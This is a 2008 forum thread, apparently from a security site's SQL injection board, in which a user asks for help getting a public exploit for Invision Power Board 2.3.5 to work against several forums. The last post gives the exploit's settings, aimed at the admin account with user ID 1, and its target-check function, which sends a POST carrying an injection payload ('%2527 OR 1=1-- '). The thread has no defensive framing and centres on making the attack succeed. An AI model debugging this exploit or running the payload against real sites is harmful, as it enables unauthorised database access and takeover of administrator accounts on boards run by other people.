|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 77
Members: 0
Total: 77
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Help with IPB 2.3.5 Remote SQL Injection |
|
Posted: Wed Oct 15, 2008 2:58 am |
|
|
MINARET |
Regular user |
|
|
Joined: Oct 15, 2008 |
Posts: 9 |
|
|
|
|
|
|
|
I found this and can't get any forum to work with it. I've tried with and without proxy and different forums too.
http://milw0rm.com/exploits/6507
Any help here? Thanks,
~/minaret |
|
|
|
|
Posted: Wed Oct 15, 2008 4:20 am |
|
|
Cablekid |
Advanced user |
|
|
Joined: Jul 14, 2007 |
Posts: 85 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Wed Oct 15, 2008 10:14 pm |
|
|
MINARET |
Regular user |
|
|
Joined: Oct 15, 2008 |
Posts: 9 |
|
|
|
|
|
|
|
Thanks for the version check. On one of the boards I am trying to use this on it checks out with an IPS drive error, so that's not the problem. Know of any settings that could be causing it not to ever find a proper URL? |
|
|
|
|
|
|
|
|
Posted: Thu Oct 16, 2008 12:40 am |
|
|
MINARET |
Regular user |
|
|
Joined: Oct 15, 2008 |
Posts: 9 |
|
|
|
|
|
|
|
Code: | $url = 'http://domainoftarget.com/ipbforums/';
$id = 1;// ID of the target user, default value "1" is admin's ID
$prefix = 'ibf_';// IPB table prefix, default is "ibf_" |
The URL test fails every time. Always spits back "Invalid response, target URL not valid? Exiting" The function is
Code: | function test_target_url()
{
global $url;
$post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
$buff = trim(make_post($url, $post, '', $url));
if($buff !== 'found')
{
die('Invalid response, target URL not valid? Exiting ...');
}
} |
Is there something not working in there? I dont see anything wrong.
All help appreciated, thanks. |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|